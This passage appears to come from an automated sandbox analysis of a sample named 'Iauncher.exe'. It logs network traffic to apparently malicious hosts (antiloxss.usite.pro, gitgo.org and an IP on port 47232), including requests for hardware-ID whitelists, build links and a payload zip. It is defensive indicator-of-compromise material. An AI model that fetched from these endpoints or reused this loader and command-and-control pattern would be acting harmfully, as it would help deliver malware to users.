May 1, 2024 20:46:09.617512941 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.617553949 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:09.618025064 CEST	49741	443	192.168.2.4	104.21.44.179
May 1, 2024 20:46:13.246717930 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:13.449975014 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:13.450081110 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:13.460123062 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:13.663573027 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:13.704256058 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:13.736991882 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:13.940960884 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:14.094961882 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:19.020764112 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:19.226911068 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:19.226958036 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:19.227011919 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:19.227047920 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:19.227085114 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:19.227109909 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:19.227109909 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:19.315841913 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.491997004 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.695152998 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.695322037 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.695372105 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.695419073 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.695568085 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.695705891 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.898525000 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.898660898 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.898701906 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.898811102 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.898888111 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.899152040 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.899210930 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:20.899223089 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.899281025 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:20.901567936 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.101986885 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.102006912 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.102144957 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.102205038 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.102298021 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.102307081 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.102359056 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.102443933 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.102586031 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.102622032 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.102663994 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.102817059 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.103018999 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.103035927 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.103096962 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.103176117 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.103308916 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.103316069 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.103372097 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.103543043 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.103601933 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.104710102 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.104768038 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.104816914 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.104827881 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.305351019 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.305413961 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.305507898 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.305636883 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.305675030 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.305828094 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.305960894 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.306221008 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.306390047 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.306461096 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.306675911 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.306695938 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.306937933 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.306951046 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.306953907 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.307008028 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.307163954 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.307425022 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.307662010 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.307677984 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.307794094 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.308022976 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.308161020 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.308273077 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.308408976 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.308624983 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.508654118 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.508877039 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.508946896 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.510013103 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.510031939 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.510226011 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.510560989 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.511445999 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.512078047 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.512165070 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.512253046 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.512445927 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.512581110 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.512748003 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.519345045 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.519361019 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.519490004 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.519510031 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.519730091 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.519793987 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.712215900 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.712261915 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.712431908 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.712465048 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.712660074 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.712857962 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.712953091 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.713103056 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.713134050 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.713387966 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.713501930 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.713655949 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.713932991 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.714092970 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.714328051 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.714401960 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.722758055 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.722806931 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.722987890 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.723051071 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.723319054 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.723542929 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.723647118 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.723792076 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.723879099 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.724035978 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.724288940 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.724404097 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.724567890 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.724668980 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.724884033 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.724915981 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.725087881 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.725147009 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.919102907 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.919303894 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.919337034 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.919534922 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.919661999 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.919735909 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.919769049 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.919800043 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.920248985 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.920439005 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.920933962 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.921005011 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.928167105 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.928215981 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.928247929 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.928380966 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.928602934 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.928653955 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.928872108 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929088116 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929153919 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929205894 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929306984 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929480076 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929668903 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929701090 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929919958 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.929972887 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.930159092 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:21.931601048 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:21.931669950 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:22.124191046 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124316931 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124350071 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124488115 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124665022 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124790907 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124864101 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124896049 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.124986887 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125068903 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125179052 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125338078 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125370026 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125519991 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125552893 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125660896 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125711918 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.125936031 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.126199961 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.126357079 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:22.134794950 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.134829998 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.134902000 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.135113001 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.135226965 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.135349035 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.135638952 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.135808945 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.135839939 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.135989904 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.136020899 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.136253119 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.136409044 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.136441946 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.136472940 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.136611938 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.136709929 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.329513073 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.329569101 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.329634905 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.329786062 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.330212116 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.372440100 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.429979086 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.430851936 CEST	49742	47232	192.168.2.4	147.45.47.65
May 1, 2024 20:46:22.634906054 CEST	47232	49742	147.45.47.65	192.168.2.4
May 1, 2024 20:46:22.667356014 CEST	49742	47232	192.168.2.4	147.45.47.65

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 1, 2024 20:46:00.567176104 CEST	55977	53	192.168.2.4	1.1.1.1
May 1, 2024 20:46:00.666878939 CEST	53	55977	1.1.1.1	192.168.2.4
May 1, 2024 20:46:02.745066881 CEST	51017	53	192.168.2.4	1.1.1.1
May 1, 2024 20:46:02.840274096 CEST	53	51017	1.1.1.1	192.168.2.4
May 1, 2024 20:46:08.329915047 CEST	50982	53	192.168.2.4	1.1.1.1
May 1, 2024 20:46:08.434094906 CEST	53	50982	1.1.1.1	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 1, 2024 20:46:02.851413965 CEST	192.168.2.4	142.251.163.113	4d5a		Echo
May 1, 2024 20:46:02.946630955 CEST	142.251.163.113	192.168.2.4	555a		Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 1, 2024 20:46:00.567176104 CEST	192.168.2.4	1.1.1.1	0x3c29	Standard query (0)	antiloxss.usite.pro	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:02.745066881 CEST	192.168.2.4	1.1.1.1	0x3009	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:08.329915047 CEST	192.168.2.4	1.1.1.1	0xdb8c	Standard query (0)	gitgo.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 1, 2024 20:46:00.666878939 CEST	1.1.1.1	192.168.2.4	0x3c29	No error (0)	antiloxss.usite.pro	193.109.246.100	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:02.840274096 CEST	1.1.1.1	192.168.2.4	0x3009	No error (0)	google.com	142.251.163.113	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:02.840274096 CEST	1.1.1.1	192.168.2.4	0x3009	No error (0)	google.com	142.251.163.138	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:02.840274096 CEST	1.1.1.1	192.168.2.4	0x3009	No error (0)	google.com	142.251.163.100	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:02.840274096 CEST	1.1.1.1	192.168.2.4	0x3009	No error (0)	google.com	142.251.163.102	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:02.840274096 CEST	1.1.1.1	192.168.2.4	0x3009	No error (0)	google.com	142.251.163.101	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:02.840274096 CEST	1.1.1.1	192.168.2.4	0x3009	No error (0)	google.com	142.251.163.139	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:08.434094906 CEST	1.1.1.1	192.168.2.4	0xdb8c	No error (0)	gitgo.org	104.21.44.179	A (IP address)	IN (0x0001)	false
May 1, 2024 20:46:08.434094906 CEST	1.1.1.1	192.168.2.4	0xdb8c	No error (0)	gitgo.org	172.67.202.98	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

antiloxss.usite.pro

gitgo.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	193.109.246.100	443	2448	C:\Users\user\Desktop\Iauncher.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 18:46:02 UTC	98	OUT	GET /STLprograms/NEW/z-Closing.txt HTTP/1.1 Host: antiloxss.usite.pro Connection: Keep-Alive
2024-05-01 18:46:02 UTC	324	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 May 2024 18:45:59 GMT Content-Type: text/plain Content-Length: 3 Last-Modified: Mon, 15 Apr 2024 17:02:11 GMT Connection: close ETag: "661d5d93-3" Expires: Tue, 21 May 2024 18:45:59 GMT Cache-Control: max-age=1728000 X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2024-05-01 18:46:02 UTC	3	IN	Data Raw: 31 30 30 Data Ascii: 100

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49734	193.109.246.100	443	2448	C:\Users\user\Desktop\Iauncher.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 18:46:03 UTC	69	OUT	GET /STLprograms/NEW/hwid.txt HTTP/1.1 Host: antiloxss.usite.pro
2024-05-01 18:46:03 UTC	327	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 May 2024 18:46:00 GMT Content-Type: text/plain Content-Length: 183 Last-Modified: Wed, 17 Apr 2024 21:03:02 GMT Connection: close ETag: "66203906-b7" Expires: Tue, 21 May 2024 18:46:00 GMT Cache-Control: max-age=1728000 X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2024-05-01 18:46:03 UTC	183	IN	Data Raw: 53 2d 31 2d 35 2d 32 31 2d 31 38 37 38 35 36 33 38 36 33 2d 32 36 32 37 33 37 33 32 30 37 2d 33 31 31 34 31 32 37 33 33 33 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 32 34 39 39 36 32 30 37 39 39 2d 32 34 31 35 33 31 36 38 39 31 2d 38 37 34 30 38 34 35 34 36 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 31 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31 0a 53 2d 31 2d 35 2d 32 31 2d 33 32 30 37 38 37 35 35 2d 31 37 36 39 31 31 34 32 35 34 2d 31 30 34 38 30 33 30 35 37 35 2d 31 30 30 31 Data Ascii: S-1-5-21-1878563863-2627373207-3114127333-1001S-1-5-21-2499620799-2415316891-874084546-1001S-1-5-21-32078755-17691142541-1048030575-1001S-1-5-21-32078755-1769114254-1048030575-1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	193.109.246.100	443	2448	C:\Users\user\Desktop\Iauncher.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 18:46:04 UTC	77	OUT	GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1 Host: antiloxss.usite.pro
2024-05-01 18:46:04 UTC	326	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 May 2024 18:46:01 GMT Content-Type: text/plain Content-Length: 44 Last-Modified: Wed, 24 Apr 2024 18:13:24 GMT Connection: close ETag: "66294bc4-2c" Expires: Tue, 21 May 2024 18:46:01 GMT Cache-Control: max-age=1728000 X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2024-05-01 18:46:04 UTC	44	IN	Data Raw: 53 2d 31 2d 35 2d 32 31 2d 32 32 35 32 33 36 39 36 35 36 2d 31 30 35 37 34 34 30 37 34 30 2d 38 33 34 34 36 37 31 33 2d 31 30 30 31 Data Ascii: S-1-5-21-2252369656-1057440740-83446713-1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	193.109.246.100	443	2448	C:\Users\user\Desktop\Iauncher.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 18:46:05 UTC	88	OUT	GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1 Host: antiloxss.usite.pro
2024-05-01 18:46:05 UTC	326	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 May 2024 18:46:02 GMT Content-Type: text/plain Content-Length: 30 Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT Connection: close ETag: "662a75ba-1e" Expires: Tue, 21 May 2024 18:46:02 GMT Cache-Control: max-age=1728000 X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2024-05-01 18:46:05 UTC	30	IN	Data Raw: 68 74 74 70 73 3a 2f 2f 67 69 74 67 6f 2e 6f 72 67 2f 49 61 75 6e 63 68 65 72 2e 7a 69 70 Data Ascii: https://gitgo.org/Iauncher.zip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49739	193.109.246.100	443	2448	C:\Users\user\Desktop\Iauncher.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 18:46:07 UTC	88	OUT	GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1 Host: antiloxss.usite.pro
2024-05-01 18:46:07 UTC	325	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 May 2024 18:46:03 GMT Content-Type: text/plain Content-Length: 12 Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT Connection: close ETag: "662a75ba-c" Expires: Tue, 21 May 2024 18:46:03 GMT Cache-Control: max-age=1728000 X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2024-05-01 18:46:07 UTC	12	IN	Data Raw: 49 61 75 6e 63 68 65 72 2e 65 78 65 Data Ascii: Iauncher.exe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49740	193.109.246.100	443	2448	C:\Users\user\Desktop\Iauncher.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 18:46:08 UTC	91	OUT	GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1 Host: antiloxss.usite.pro
2024-05-01 18:46:08 UTC	325	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 May 2024 18:46:04 GMT Content-Type: text/plain Content-Length: 12 Last-Modified: Thu, 25 Apr 2024 15:24:42 GMT Connection: close ETag: "662a75ba-c" Expires: Tue, 21 May 2024 18:46:04 GMT Cache-Control: max-age=1728000 X-Frame-Options: SAMEORIGIN Accept-Ranges: bytes
2024-05-01 18:46:08 UTC	12	IN	Data Raw: 49 61 75 6e 63 68 65 72 2e 7a 69 70 Data Ascii: Iauncher.zip

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49741	104.21.44.179	443	2448	C:\Users\user\Desktop\Iauncher.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-01 18:46:08 UTC	71	OUT	GET /Iauncher.zip HTTP/1.1 Host: gitgo.org Connection: Keep-Alive
